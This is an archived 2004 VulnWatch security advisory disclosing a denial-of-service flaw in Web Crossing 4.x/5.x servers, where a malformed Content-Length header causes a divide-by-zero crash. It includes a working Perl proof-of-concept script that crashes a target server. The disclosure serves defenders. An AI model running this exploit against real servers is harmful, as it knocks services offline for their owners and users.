[VulnWatch] Web Crossing 4.x/5.x Denial of Service Vulnerability

From: Peter Winter-Smith (peter4020_at_hotmail.com)
Date: 02/03/04

  • Next message: NGSoftware Insight Security Research: "[VulnWatch] Multiple File Format Vulnerabilities (Overruns) in REALOne & RealPlayer"
    To: vulnwatch@vulnwatch.org
    Date: Tue, 03 Feb 2004 20:08:07 +0000
    
    

    Web Crossing 4.x/5.x Denial of Service Vulnerability

    ###################################################

    Credit:
    Author : Peter Winter-Smith

    Software:
    Package : Web Crossing
    Versions : 4.x/5.x
    Vendor : WebCrossing, Inc.
    Vendor Url : http://www.webcrossing.com/

    Vulnerability:
    Bug Type : Denial of Service
    Severity : Less Critical

    1. Description of Software

    "Web Crossing is the world's leading collaboration server platform,
    offering complete solutions including discussion groups/bulletin boards,
    integrated newsgroups and mailing lists, full email services, calendar
    services, real-time chats, live events and full web application
    programming features, complete cross-platform compatibility, and
    distributed/mirrored serving for ultimate scaleability."
    - Vendors Description

    2. Bug Information

    (a). Denial of Service

    When an HTTP POST request is made to Web Crossing's built-in server
    application (default port 80/tcp), if the 'Content-Length' header supplied
    with the request is an extremely large or negative number, the server
    will encounter a set of instructions which lead to an integer-divide-by-
    zero problem, immediately crashing the server and denying any further
    service.

    The offending instruction is located at 0090121F:

    0090121F F7F9 IDIV ECX

    3. Proof of Concept

    The following perl script should crash any Web Crossing BBS using the
    built-in server application for hosting:

    #########################################################################
    #!/usr/bin/perl -w
    #
    # Web Crossing 4.x\5.x Denial of Service Exploit
    # [ Bad 'Content-Length' Header Bug ]
    #
    # - by Peter Winter-Smith [peter4020@hotmail.com]

    use IO::Socket;

    if(!($ARGV[0]))
    {
    print "Usage: wxdos.pl <victim>\n";
    exit;
    }

    print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .
          "\t[ Bad 'Content-Length' Header Bug ]\n" .
          "\t[peter4020\@hotmail.com]\n\n";

    $victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
                                 PeerPort=>"80")
                                or die "Unable to connect to $ARGV[0] on " .
                                 "port 80";

    $DoS = "POST / HTTP/1.1\r\n" .
              "Content-Length: -1\r\n\r\n";

    print $victim $DoS;

    print "[+] Evil request made to target server ... Waiting...!\n";

    sleep(4);

    close($victim);

    print "[+] Done!\n";
    exit;
    #########################################################################

    4. Patches - Workarounds

    Although I was able to contact the Web Crossing support staff, when the
    investigation into this flaw was handed over to the development team all
    contact was lost with both them and the support staff and my emails were
    no-longer answered. I have decided to release this information so that
    users of Web Crossing can decide what would be a suitable course of action
    for protecting their systems from this bug.

    No vendor supplied patches exist, I would recommend that filtering of the
    'Content-Length' header is put into action via some third party
    application if at all possible.

    5. Credits

        The discovery, analysis and exploitation of this flaw is a result of
    research carried out by Peter Winter-Smith. I would ask that you do not
    regard any of the analysis to be 'set in stone', and that if investigating
    this flaw you back trace the steps detailed earlier for yourself.

    Greets and thanks to:
        David and Mark Litchfield, JJ Gray (Nexus), Todd and all the
    packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),
    pv8man, nick k., Joel J. and Martine.

    o This document should be mirrored at
                       http://www.elitehaven.net/webxdos.txt

    _________________________________________________________________
    Sign-up for a FREE BT Broadband connection today!
    http://www.msn.co.uk/specials/btbroadband


  • Next message: NGSoftware Insight Security Research: "[VulnWatch] Multiple File Format Vulnerabilities (Overruns) in REALOne & RealPlayer"

    Relevant Pages

    • Web Crossing 4.x/5.x Denial of Service Vulnerability
      ... Web Crossing 4.x/5.x Denial of Service Vulnerability ... Author: Peter Winter-Smith ... Vendor: WebCrossing, Inc. ... "Web Crossing is the world's leading collaboration server platform, ...
      (Bugtraq)
    • [NEWS] Web Crossing Denial Of Service
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... " Web Crossing is the world's leading ... A denial-of-service condition occurs when sending the built-in web server ... reached the development team all communications with the vendor ceased. ...
      (Securiteam)
    • Re: web based newsgroup server
      ... Please check out Web Crossing at http://webcrossing.com. ... forums, news server, email, webmail, FTP server, complete mail server, etc., ... > I currently have troll and newsportal installed. ... > subscriptions to work with Troll. ...
      (RedHat)